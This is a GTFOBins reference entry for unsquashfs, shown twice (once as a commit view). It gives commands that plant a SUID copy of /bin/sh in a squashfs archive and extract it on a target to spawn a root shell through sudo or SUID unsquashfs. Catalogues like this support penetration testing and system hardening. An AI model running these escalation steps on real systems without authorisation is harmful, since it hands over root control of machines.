GTFOBins.github.io/_gtfobins/unsquashfs.md

---
description: |
  `unsquashfs` preserve the SUID bit when extracting the file system. Prepare an archive beforehand with the following commands as root:

  ```
  cp /bin/sh .
  chmod +s sh
  mksquashfs sh shell
  ```

  Extract it on the target, then run the SUID shell as usual (omitting the `-p` where appropriate).
functions:
  sudo:
    - code: |
        sudo unsquashfs shell
        ./squashfs-root/sh -p
  suid:
    - code: |
        ./unsquashfs shell
        ./squashfs-root/sh -p
---
Add unsquashfs Co-authored-by: Andrea Cardaci <cyrus.and@gmail.com> 2023-09-02 08:29:00 +02:00			`---`
			`description: \|`
			`unsquashfs` preserve the SUID bit when extracting the file system. Prepare an archive beforehand with the following commands as root:

			```
			`cp /bin/sh .`
			`chmod +s sh`
			`mksquashfs sh shell`
			```

			Extract it on the target, then run the SUID shell as usual (omitting the `-p` where appropriate).
			`functions:`
			`sudo:`
			`- code: \|`
			`sudo unsquashfs shell`
			`./squashfs-root/sh -p`
			`suid:`
			`- code: \|`
			`./unsquashfs shell`
			`./squashfs-root/sh -p`
			`---`